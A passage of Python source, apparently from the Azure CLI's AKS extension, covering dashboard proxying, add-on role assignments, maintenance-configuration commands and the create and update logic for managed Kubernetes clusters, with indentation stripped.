dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(
result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
disable_public_fqdn=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
http_proxy_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
enable_secret_rotation=False,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
yes=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if dns_name_prefix and fqdn_subdomain:
raise CLIError(
'--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
if not dns_name_prefix and not fqdn_subdomain:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(
load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError(
'--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
# Must be 12 chars or less before ACS RP adds to it
name=_trim_nodepoolname(nodepool_name),
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
os_sku=os_sku,
mode="System",
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
enable_fips=enable_fips_image,
node_public_ip_prefix_id=node_public_ip_prefix_id,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
if kubelet_config:
agent_pool_profile.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool_profile.linux_os_config = _get_linux_os_config(
linux_os_config)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(
admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
service_principal_profile = None
principal_obj = None
# If customer explicitly provides a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
if not enable_managed_identity:
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
fqdn_subdomain=fqdn_subdomain, location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
'(option --assign-identity) when you want to bring your own'
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
from knack.prompting import prompt_y_n
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(
cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(
outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError(
'Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd=cmd,
addons_str=enable_addons,
subscription_id=subscription_id,
resource_group_name=resource_group_name,
addon_profiles={},
workspace_resource_id=workspace_resource_id,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring,
appgw_name=appgw_name,
appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
aci_subnet_name=aci_subnet_name,
vnet_subnet_id=vnet_subnet_id,
enable_secret_rotation=enable_secret_rotation,
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
if enable_msi_auth_for_monitoring and not enable_managed_identity:
raise ArgumentUsageError("--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
_ensure_container_insights_for_monitoring(cmd,
addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id,
resource_group_name, name, location,
aad_route=enable_msi_auth_for_monitoring, create_dcr=True,
create_dcra=False)
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
if disable_rbac and enable_azure_rbac:
raise CLIError(
'"--enable-azure-rbac" can not be used together with "--disable-rbac"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
# ids -> i_ds due to track 2 naming issue
admin_group_object_i_ds=_parse_comma_separated_list(
aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
raise CLIError(
'"--admin-aad-object-id" can only be used together with "--enable-aad"')
if enable_azure_rbac is True:
raise CLIError(
'"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError(
'specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges)
identity = None
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedServiceIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
identity_profile = None
if assign_kubelet_identity:
if not assign_identity:
raise CLIError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
identity_profile = {
'kubeletidentity': UserAssignedIdentity(
resource_id=assign_kubelet_identity,
client_id=kubelet_identity.client_id,
object_id=kubelet_identity.principal_id
)
}
cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
# ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
_ensure_cluster_identity_permission_on_kubelet_identity(cmd.cli_ctx, cluster_identity_object_id, assign_kubelet_identity)
pod_identity_profile = None
if enable_pod_identity:
if not enable_managed_identity:
raise CLIError(
'--enable-pod-identity can only be specified when --enable-managed-identity is specified')
pod_identity_profile = ManagedClusterPodIdentityProfile(enabled=True)
_ensure_pod_identity_kubenet_consent(
network_profile, pod_identity_profile, enable_pod_identity_with_kubenet)
enable_rbac = True
if disable_rbac:
enable_rbac = False
auto_upgrade_profile = None
if auto_upgrade_channel is not None:
auto_upgrade_profile = ManagedClusterAutoUpgradeProfile(
upgrade_channel=auto_upgrade_channel)
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile,
auto_upgrade_profile=auto_upgrade_profile,
pod_identity_profile=pod_identity_profile,
identity_profile=identity_profile,
disable_local_accounts=bool(disable_local_accounts))
if node_resource_group:
mc.node_resource_group = node_resource_group
use_custom_private_dns_zone = False
if not enable_private_cluster and disable_public_fqdn:
raise ArgumentUsageError("--disable_public_fqdn should only be used with --enable-private-cluster")
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise ArgumentUsageError(
"Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if disable_public_fqdn:
mc.api_server_access_profile.enable_private_cluster_public_fqdn = False
if private_dns_zone:
if not enable_private_cluster:
raise ArgumentUsageError(
"Invalid private dns zone for public cluster. It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
from msrestazure.tools import is_valid_resource_id
if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM and private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_NONE:
if is_valid_resource_id(private_dns_zone):
use_custom_private_dns_zone = True
else:
raise ResourceNotFoundError(private_dns_zone + " is not a valid Azure resource ID.")
if fqdn_subdomain:
if not use_custom_private_dns_zone:
raise ArgumentUsageError(
"--fqdn-subdomain should only be used for private cluster with custom private dns zone")
mc.fqdn_subdomain = fqdn_subdomain
if http_proxy_config:
mc.http_proxy_config = _get_http_proxy_config(http_proxy_config)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = get_aks_custom_headers(aks_custom_headers)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
if monitoring and enable_msi_auth_for_monitoring:
# Creating a DCR Association (for the monitoring addon) requires waiting for cluster creation to finish
no_wait = False
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait)
if monitoring and enable_msi_auth_for_monitoring:
# Create the DCR Association here
_ensure_container_insights_for_monitoring(cmd,
addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id,
resource_group_name, name, location,
aad_route=enable_msi_auth_for_monitoring, create_dcr=False,
create_dcra=True)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (
aad_tenant_id is None and aad_admin_group_object_ids is None and not enable_azure_rbac and not disable_azure_rbac)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile and \
not uptime_sla and \
not no_uptime_sla and \
not enable_aad and \
not update_aad_profile and \
not enable_ahub and \
not disable_ahub and \
not auto_upgrade_channel and \
not enable_managed_identity and \
not assign_identity and \
not enable_pod_identity and \
not disable_pod_identity and \
not enable_secret_rotation and \
not disable_secret_rotation and \
not tags and \
not windows_admin_password and \
not enable_local_accounts and \
not disable_local_accounts and \
not enable_public_fqdn and \
not disable_public_fqdn:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--uptime-sla" or '
'"--no-uptime-sla" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--enable-managed-identity" or '
'"--enable-pod-identity" or '
'"--disable-pod-identity" or '
'"--auto-upgrade-channel" or '
'"--enable-secret-rotation" or '
'"--disable-secret-rotation" or '
'"--tags" or '
'"--windows-admin-password" or '
'"--enable-azure-rbac" or '
'"--disable-azure-rbac" or '
'"--enable-local-accounts" or '
'"--disable-local-accounts" or '
'"--enable-public-fqdn" or '
'"--disable-public-fqdn"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning(
'Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if disable_local_accounts and enable_local_accounts:
raise CLIError('Cannot specify --disable-local-accounts and --enable-local-accounts '
'at the same time.')
if disable_local_accounts:
instance.disable_local_accounts = True
if enable_local_accounts:
instance.disable_local_accounts = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError(
'Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
if uptime_sla and no_uptime_sla:
raise CLIError(
'Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if no_uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Free"
)
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
